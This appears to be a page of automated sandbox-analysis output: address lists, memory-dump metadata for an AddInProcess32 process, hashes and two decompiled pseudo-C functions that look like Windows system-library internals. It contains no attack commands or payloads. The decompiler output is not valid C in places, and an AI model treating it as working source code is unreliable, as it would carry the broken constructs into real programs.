0x00000000
0x00000000
0x0186d6bf
0x0186d6bf
0x0186d6e5
0x0186d6e7
0x0186d6e9
0x0186d6ec
0x0186d6ec
0x0186d6ef
0x0186d6f5
0x0186d6f9
0x0186d6fb
0x0186d6fd
0x0186d701
0x0186d703
0x0186d70a
0x0186d70a
0x0186d701
0x0186d710
0x0186d710
0x0186d6c1
0x0186d6c1
0x0186d6c6
0x018bb36d
0x018bb36f
0x00000000
0x018bb375
0x018bb375
0x018bb375
0x00000000
0x018bb375
0x00000000
0x0186d6cc
0x0186d6d8
0x0186d6d8
0x0186d6d8
0x00000000
0x0186d6c6
0x0186d6bf
0x00000000
0x0186d6da
0x0186d6da
0x0186d716
0x0186d71b
0x0186d720
0x0186d726
0x0186d726
0x0186d72d
0x00000000
0x0186d733
0x0186d739
0x0186d742
0x0186d750
0x0186d758
0x0186d764
0x0186d776
0x0186d77a
0x0186d783
0x0186d928
0x0186d92c
0x0186d93d
0x0186d944
0x0186d94f
0x0186d954
0x0186d956
0x0186d95f
0x0186d961
0x0186d973
0x0186d973
0x0186d956
0x0186d944
0x0186d92c
0x0186d78b
0x018bb394
0x0186d791
0x0186d798
0x018bb3a3
0x018bb3bb
0x018bb3bb
0x0186d7a5
0x0186d866
0x0186d870
0x0186d884
0x0186d892
0x0186d898
0x0186d89e
0x0186d8a0
0x0186d8a6
0x0186d8ac
0x0186d8ae
0x0186d8b4
0x0186d8b4
0x0186d8ae
0x0186d7a5
0x0186d78b
0x0186d7b1
0x018bb3c5
0x018bb3c5
0x0186d7c3
0x0186d7ca
0x0186d7e5
0x0186d7eb
0x0186d8eb
0x0186d8ed
0x00000000
0x0186d8f3
0x0186d8f3
0x0186d8f3
0x00000000
0x0186d8ed
0x0186d7cc
0x0186d7cc
0x0186d7d2
0x00000000
0x0186d7d4
0x0186d7d4
0x0186d7d7
0x0186d7df
0x018bb3d4
0x018bb3d9
0x018bb3dc
0x018bb3dc
0x018bb3df
0x018bb3e2
0x018bb468
0x018bb46d
0x018bb46f
0x018bb46f
0x018bb475
0x0186d8f8
0x0186d8f9
0x0186d8fd
0x018bb3e8
0x018bb3e8
0x018bb3eb
0x018bb3ed
0x00000000
0x018bb3ef
0x018bb3ef
0x018bb3f1
0x018bb3f4
0x018bb3fe
0x018bb404
0x018bb409
0x018bb40e
0x018bb410
0x018bb410
0x018bb414
0x018bb414
0x018bb41b
0x018bb420
0x018bb423
0x018bb425
0x018bb427
0x018bb42a
0x018bb42d
0x018bb42d
0x018bb42a
0x018bb432
0x018bb436
0x018bb438
0x018bb43b
0x018bb43b
0x018bb449
0x018bb44e
0x018bb454
0x018bb458
0x018bb458
0x018bb45d
0x00000000
0x018bb45d
0x018bb3ed
0x00000000
0x00000000
0x00000000
0x0186d7df
0x0186d7d2
0x0186d7ca
0x018bb37c
0x018bb37e
0x018bb385
0x018bb38a
0x00000000
0x018bb38a
0x0186d742
0x0186d7f1
0x0186d7f8
0x018bb49b
0x018bb49b
0x0186d800
0x0186d837
0x0186d843
0x0186d845
0x0186d847
0x0186d84a
0x0186d84b
0x0186d84e
0x0186d857
0x0186d802
0x0186d802
0x0186d80d
0x00000000
0x0186d818
0x0186d818
0x0186d824
0x0186d831
0x018bb4a5
0x018bb4ab
0x018bb4b3
0x018bb4b8
0x018bb4bb
0x00000000
0x018bb4c1
0x018bb4c1
0x018bb4c8
0x00000000
0x018bb4ce
0x018bb4d4
0x018bb4e1
0x018bb4e3
0x018bb4e5
0x00000000
0x018bb4eb
0x018bb4f0
0x018bb4f2
0x0186dac9
0x0186dacc
0x0186dacf
0x0186dad1
0x0186dd78
0x0186dd78
0x0186dcf2
0x00000000
0x0186dad7
0x0186dad9
0x0186dadb
0x00000000
0x00000000
0x0186dae1
0x0186dae1
0x0186dae4
0x0186dae6
0x018bb4f9
0x018bb4f9
0x018bb500
0x0186daec
0x0186daec
0x0186daf5
0x0186daf8
0x0186dafb
0x0186db03
0x0186db11
0x0186db16
0x0186db19
0x0186db1b
0x018bb52c
0x018bb531
0x018bb534
0x0186db21
0x0186db21
0x0186db24
0x0186dcd9
0x0186dce2
0x0186dce5
0x0186dd6a
0x0186dd6d
0x00000000
0x0186dd73
0x018bb51a
0x018bb51c
0x018bb51f
0x018bb524
0x00000000
0x018bb524
0x0186dce7
0x0186dce7
0x0186dce7
0x00000000
0x0186dce7
0x00000000
0x0186db2a
0x0186db2c
0x0186db31
0x0186db33
0x0186db36
0x0186db39
0x0186db3b
0x0186db66
0x0186db66
0x0186db3d
0x0186db3d
0x0186db3e
0x0186db46
0x0186db47
0x0186db49
0x0186db4c
0x0186db53
0x0186db55
0x0186db58
0x0186db5a
0x018bb50a
0x018bb50f
0x018bb512
0x0186db60
0x0186db60
0x0186db63
0x0186db63
0x00000000
0x0186db63
0x0186db5a
0x0186db3b
0x0186db24
0x0186db69
0x0186db69
0x0186db6c
0x0186db6f
0x0186db74
0x018bb557
0x018bb557
0x018bb55e
0x0186db7a
0x0186db7c
0x0186db7f
0x0186db82
0x0186db85
0x00000000
0x0186db8b
0x0186db8b
0x0186db8d
0x0186db9b
0x0186db9b
0x0186db9d
0x0186dba0
0x0186dba2
0x0186dba4
0x0186dba7
0x0186dba9
0x0186dbae
0x0186dbae
0x0186dbb1
0x0186dbb4
0x0186dbb4
0x0186dbb7
0x0186dbba
0x0186dcd2
0x0186dcd4
0x00000000
0x0186dbc0
0x0186dbc0
0x0186dbd2
0x0186dbd7
0x0186dbda
0x0186dbdd
0x0186dbdf
0x00000000
0x0186dbe5
0x0186dbe5
0x0186dbee
0x0186dbf1
0x018bb541
0x018bb544
0x00000000
0x018bb546
0x018bb546
0x00000000
0x018bb546
0x0186dbf7
0x0186dbf7
0x0186dbfd
0x0186dbfd
0x0186dbff
0x0186dc0b
0x0186dc15
0x0186dc1b
0x0186dc1d
0x0186dc21
0x0186dc21
0x0186dc23
0x0186dc23
0x0186dc26
0x0186dc29
0x0186dc2b
0x00000000
0x00000000
0x0186dc31
0x0186dc34
0x0186dc36
0x0186dcbf
0x0186dcbf
0x0186dcc2
0x00000000
0x0186dc3c
0x0186dc41
0x0186dc43
0x00000000
0x0186dc45
0x0186dc45
0x0186dc47
0x00000000
0x0186dc4d
0x0186dc4d
0x0186dc50
0x0186dc52
0x0186dc55
0x0186dcfa
0x0186dcfe
0x0186dd08
0x0186dd0a
0x0186dd0c
0x00000000
0x0186dd12
0x0186dd15
0x0186dd2d
0x0186dd2f
0x0186dd32
0x0186dd35
0x00000000
0x0186dd35
0x0186dc5b
0x0186dc5b
0x0186dc5e
0x0186dc61
0x0186dc64
0x0186dc67
0x0186dc67
0x0186dc6a
0x0186dc6c
0x0186dc8e
0x0186dc8e
0x0186dc91
0x0186dc93
0x0186dcce
0x0186dcce
0x0186dc95
0x0186dc9c
0x0186dc6e
0x0186dc72
0x0186dc75
0x0186dc77
0x0186dc79
0x018bb551
0x018bb551
0x00000000
0x0186dc7f
0x0186dc7f
0x0186dc81
0x00000000
0x0186dc83
0x0186dc86
0x0186dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0186dc88
0x0186dc81
0x0186dc79
0x0186dc6c
0x0186dc55
0x0186dc47
0x0186dc43
0x00000000
0x0186dc36
0x0186dc23
0x00000000
0x0186dbff
0x0186dbf1
0x0186dbdf
0x0186db8f
0x0186db92
0x0186db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0186db95
0x0186db8d
0x0186db85
0x0186db74
0x0186dc9f
0x0186dca2
0x0186dcb0
0x0186dcb0
0x0186dad1
0x018bb4e5
0x018bb4c8
0x00000000
0x00000000
0x00000000
0x0186d831
0x0186d80d
0x00000000
0x0186d800
0x018bb47f
0x018bb485
0x00000000
0x018bb485
0x0186d665
0x0186d652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 0186D898

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d4042993dcb9e78932a6963e0affa087bbcfc2b00f2d3d3068280c1a601a611e
Instruction ID: 482bb0a662a3639453dcd23f73825217c74fae2d2dfaf7195c336df03df136fa
Opcode Fuzzy Hash: d4042993dcb9e78932a6963e0affa087bbcfc2b00f2d3d3068280c1a601a611e
Instruction Fuzzy Hash: ECE1C234B05359CFEB25CF58C884BA9B7BABF45314F040299D949D7291D734AF81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0188513A Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0188513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x194d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0189D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01872280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01874620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0189F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0186FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x194b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0189B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01885142
0x0188514c
0x01885150
0x01885157
0x01885159
0x0188515e
0x01885165
0x01885169
0x0188516c
0x01885172
0x01885176
0x0188517a
0x0188517a
0x0188517a
0x0188517f
0x018c6d8b
0x018c6d8e
0x018c6d91
0x018c6d95
0x018c6d98
0x018c6d9c
0x018c6da0
0x018c6da3
0x018c6da7
0x018c6e26
0x018c6e26
0x018c6e2a
0x018851f9
0x018851f9
0x018851fe
0x018c6e33
0x018c6e33
0x018c6e39
0x018c6e3d
0x018c6e46
0x018c6e50
0x00000000
0x00000000
0x018c6e52
0x018c6e53
0x018c6e56
0x018c6e5d
0x00000000
0x00000000
0x00000000
0x018c6e5f
0x018c6e67
0x018c6e77
0x018c6e7f
0x018c6e80
0x018c6e88
0x018c6e90
0x018c6e9f
0x018c6ea5
0x018c6ea9
0x018c6eb1
0x018c6ebf
0x00000000
0x00000000
0x018c6ecf
0x018c6ed3
0x00000000
0x00000000
0x018c6edb
0x018c6ede
0x018c6ee1
0x018c6ee8
0x018c6eeb
0x018c6eed
0x018c6ef0
0x018c6ef4
0x018c6ef8
0x018c6efc
0x00000000
0x00000000
0x018c6f0d
0x018c6f11
0x018c6f32
0x018c6f37
0x018c6f3b
0x018c6f3e
0x018c6f41
0x018c6f46
0x00000000
0x00000000
0x018c6f4c
0x018c6f50
0x018c6f50
0x018c6f54
0x018c6f62
0x018c6f65
0x018c6f6d
0x018c6f7b
0x018c6f7b
0x018c6f93
0x018c6f98
0x018c6fa0
0x018c6fa6
0x018c6fb3
0x018c6fb6
0x018c6fbf
0x018c6fc1
0x018c6fd5
0x018c6fda
0x018c6fda
0x018c6fdd
0x018c6fe2
0x018c6fe7
0x018c6feb
0x018c6fef
0x018c6ff3
0x0188520c
0x0188520c
0x0188520f
0x01885215
0x01885234
0x0188523a
0x0188523a
0x01885244
0x01885245
0x01885246
0x01885251
0x01885251
0x018c6f13
0x018c6f17
0x018c6f17
0x018c6f18
0x018c6f1b
0x018c6f1f
0x018c6f23
0x00000000
0x018c6f28
0x01885204
0x01885204
0x01885208
0x00000000
0x01885208
0x01885185
0x01885188
0x0188518a
0x0188518e
0x01885195
0x018c6db1
0x018c6db5
0x018c6db9
0x0188519b
0x0188519b
0x0188519e
0x018851a7
0x018851a9
0x018851a9
0x018851b5
0x018851b8
0x018851bb
0x018851be
0x018851c1
0x018851c5
0x018851c9
0x018851cd
0x018851cd
0x018851d8
0x018851dc
0x018851e0
0x018c6dcc
0x018c6dd0
0x018c6dd5
0x018c6ddd
0x018c6de1
0x018c6de1
0x018c6de5
0x018c6deb
0x018c6df1
0x018c6df7
0x018c6dfd
0x018c6e01
0x018c6e05
0x018c6e09
0x018c6e0d
0x018c6e11
0x018c6e11
0x018851eb
0x018c6e1a
0x018c6e1f
0x018c6e21
0x018c6e23
0x00000000
0x018851f1
0x018851f1
0x00000000
0x018851f1

APIs

RtlDebugPrintTimes.NTDLL ref: 01885234

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 903231e00fe8d3ce1530e2956699869286d8d9e5367fb6f5bb1cdd240dbba2fd
Instruction ID: 3a9caa94a8bcb3d5773db13f28afb12a8099fc40680bfc6ce7f8f71da0e73971
Opcode Fuzzy Hash: 903231e00fe8d3ce1530e2956699869286d8d9e5367fb6f5bb1cdd240dbba2fd
Instruction Fuzzy Hash: 89C102755083818FD355CF28C580A5AFBE1BF88704F284A6EF9998B352D771EA45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 018803E2 Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E018803E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x194d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01880548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0189B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0186B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1947c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01877D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01877D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E018D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01899830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E018D69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1947c04 != 0) {
						_t118 = _v12;
						_t120 = E018DA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1947bd8;
						if( *0x1947bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E018995D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E018999A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E018D3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0185B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0189AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1948474 - 3;
										if( *0x1948474 != 3) {
											 *0x19479dc =  *0x19479dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01877D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01877D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E018D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1948708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1947b00; // 0x0
							asm("ror esi, cl");
							 *0x194b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E018995D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01867F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x018803f1
0x018803f7
0x018803f9
0x018803fb
0x018803fd
0x01880400
0x0188040a
0x018c4c7a
0x01880537
0x01880547
0x01880410
0x01880410
0x01880414
0x01880417
0x0188041a
0x01880421
0x01880424
0x0188042b
0x0188043b
0x0188043e
0x0188043f
0x0188043f
0x01880446
0x01880449
0x0188044c
0x0188044f
0x01880459
0x018c4c8d
0x0188045f
0x0188045f
0x0188045f
0x01880467
0x018c4c97
0x018c4c9d
0x018c4ca4
0x018c4caa
0x018c4caf
0x018c4cb1
0x018c4cc3
0x018c4cb3
0x018c4cbc
0x018c4cbc
0x018c4cc8
0x018c4ccb
0x018c4cd7
0x018c4cda
0x018c4cdf
0x018c4cdf
0x018c4ccb
0x018c4ca4
0x0188046d
0x0188046f
0x0188046f
0x01880471
0x01880476
0x0188047a
0x0188047b
0x01880483
0x01880489
0x0188048d
0x00000000
0x00000000
0x018c4ce9
0x018c4cef
0x018c4d22
0x018c4d22
0x00000000
0x018c4d22
0x018c4cf1
0x018c4cf7
0x00000000
0x00000000
0x018c4cf9
0x018c4cff
0x00000000
0x00000000
0x018c4d05
0x018c4d07
0x00000000
0x00000000
0x018c4d0d
0x018c4d0f
0x018c4d14
0x018c4d16
0x00000000
0x00000000
0x018c4d1c
0x018c4d1c
0x01880499
0x01880535
0x01880535
0x00000000
0x01880535
0x018804a6
0x018c4d2c
0x018c4d37
0x018c4d39
0x018c4d3b
0x00000000
0x00000000
0x018c4d41
0x018c4d48
0x01880527
0x0188052b
0x0188052d
0x01880530
0x01880530
0x00000000
0x0188052b
0x018c4d4e
0x018804ac
0x018804ac
0x018804af
0x018804b2
0x018804b7
0x018804b9
0x018804bb
0x018804bd
0x018804bf
0x018804c5
0x018804c9
0x018c4d53
0x018c4d59
0x018c4db9
0x018c4dba
0x018c4dbf
0x018c4dc2
0x018c4dc4
0x018c4dc7
0x018c4dce
0x00000000
0x018c4dce
0x018c4d5b
0x018c4d61
0x00000000
0x00000000
0x018c4d63
0x018c4d69
0x00000000
0x00000000
0x018c4d6b
0x018c4d6e
0x018c4d74
0x018c4d76
0x018c4d7c
0x018c4d7e
0x018c4d84
0x018c4d89
0x018c4d8c
0x018c4d8d
0x018c4d92
0x018c4d95
0x018c4d96
0x018c4d98
0x018c4d9a
0x018c4d9f
0x018c4da4
0x018c4da6
0x018c4da8
0x018c4daf
0x018c4db1
0x018c4db1
0x018c4daf
0x018c4da6
0x018c4d84
0x018c4d7c
0x00000000
0x018c4d74
0x018804d6
0x018c4de1
0x018804dc
0x018804dc
0x018804dc
0x018804e4
0x018c4deb
0x018c4df1
0x018c4df8
0x018c4dfe
0x018c4e03
0x018c4e05
0x018c4e17
0x018c4e07
0x018c4e10
0x018c4e10
0x018c4e1c
0x018c4e1f
0x018c4e35
0x018c4e35
0x018c4e1f
0x018c4df8
0x018804f1
0x018804fa
0x018c4e3f
0x018c4e47
0x018c4e5b
0x018c4e61
0x018c4e67
0x018c4e69
0x018c4e71
0x018c4e73
0x01880500
0x01880500
0x01880500
0x018804fa
0x01880508
0x0188051d
0x0188051d
0x0188051f
0x01880524
0x00000000
0x01880524
0x01880515
0x01880517
0x018c4e7a
